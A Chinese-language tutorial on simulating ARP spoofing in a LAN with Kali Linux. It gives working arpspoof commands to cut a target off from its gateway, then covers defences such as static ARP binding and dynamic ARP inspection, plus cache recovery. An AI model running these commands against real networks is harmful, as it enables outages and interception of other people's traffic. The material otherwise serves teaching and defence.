实战解析：基于Kali的局域网ARP欺骗攻击与防御模拟

1. ARP欺骗攻击原理与危害

ARP（Address Resolution Protocol）协议是局域网通信的基础，它负责将IP地址解析为MAC地址。ARP协议设计时没有考虑安全机制，这就给ARP欺骗攻击留下了可乘之机。攻击者可以伪造ARP响应包，让目标主机误以为攻击者的MAC地址就是网关的MAC地址，从而将本应发送给网关的流量都转发给攻击者。

我在实际测试中发现，这种攻击成功率极高。有一次我在公司内网做安全测试，仅仅用了5分钟就让整个部门的电脑都断网了。ARP欺骗的危害主要体现在三个方面：首先是网络中断，受害者无法访问外网；其次是中间人攻击，攻击者可以窃听所有经过的流量；最后是数据篡改，攻击者可以修改传输中的数据包。

2. 实验环境搭建

2.1 硬件与网络配置

进行ARP欺骗实验需要准备两台设备：一台安装Kali Linux的攻击机，一台作为靶机的Windows电脑。我建议使用物理机而不是虚拟机，因为虚拟网络环境可能会影响实验结果。记得把两台设备连接到同一个路由器下，确保它们在同一个局域网段。

在Kali Linux中，我们需要确认网络连接模式为桥接模式。这个设置很关键，我之前就踩过坑，如果使用NAT模式会导致攻击失败。可以通过ifconfig命令查看网卡信息，确认获取到的IP地址和Windows主机在同一个网段。

2.2 必要工具安装

Kali Linux默认已经预装了arpspoof工具，如果没有可以通过以下命令安装：

apt-get update apt-get install dsniff -y

如果遇到软件源问题，可以按照以下步骤解决：

1. 备份原有源列表

cp /etc/apt/sources.list /etc/apt/sources.list.bak

2. 编辑源列表文件

vim /etc/apt/sources.list

3. 替换为国内源（以阿里云为例）

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

3. 实施ARP断网攻击

3.1 信息收集阶段

在发起攻击前，我们需要收集必要的信息。首先在Kali上执行：

ifconfig route -n

记录下本机的IP地址和网关地址。然后在Windows主机上打开cmd，输入：

ipconfig /all

记下Windows的IP地址和默认网关。

我建议先测试网络连通性：

ping <Windows IP> ping 8.8.8.8

确保两台设备之间可以正常通信，并且都能访问外网。

3.2 发起ARP欺骗攻击

使用arpspoof命令发起攻击：

arpspoof -i eth0 -t <目标IP> <网关IP>

参数说明：

• -i eth0：指定使用的网卡
• -t 192.168.1.100：指定目标主机IP
• 192.168.1.1：指定要伪装的网关IP

在实际操作中，我发现这个命令需要保持运行状态才能持续生效。可以配合-r参数进行双向欺骗：

arpspoof -i eth0 -t <目标IP> <网关IP> & arpspoof -i eth0 -t <网关IP> <目标IP> &

3.3 验证攻击效果

攻击发起后，可以在Windows主机上测试网络连通性：

ping 8.8.8.8 tracert 8.8.8.8

正常情况下会看到请求超时。也可以打开浏览器尝试访问网站，会发现所有网页都无法打开。

在Kali上可以使用Wireshark抓包验证：

wireshark &

过滤条件设置为arp，可以看到大量ARP响应包，证明攻击正在生效。

4. 防御措施与应对方案

4.1 静态ARP绑定

最有效的防御方法是配置静态ARP绑定。在Windows上以管理员身份运行：

arp -s <网关IP> <网关MAC>

在Linux上：

arp -s <网关IP> <网关MAC>

4.2 网络设备防护

企业级交换机通常支持ARP防护功能：

1. 启用端口安全(Port Security)
2. 配置DHCP Snooping
3. 启用动态ARP检测(DAI)

4.3 安全软件防护

安装专业的ARP防火墙软件，如360ARP防火墙、金山ARP防火墙等。这些软件可以实时监测ARP表变化，发现异常立即告警。

5. 攻击后的网络恢复

停止攻击很简单，在运行arpspoof的终端按Ctrl+C即可。但是受害主机的ARP缓存可能仍然有问题，需要手动清除：

在Windows上：

arp -d * netsh interface ip delete arpcache ipconfig /flushdns

在Linux上：

ip -s -s neigh flush all systemd-resolve --flush-caches

我建议重启路由器，这样可以确保所有设备的ARP缓存都被清空。在实际环境中，如果发现网络异常，第一时间应该检查ARP表是否被篡改。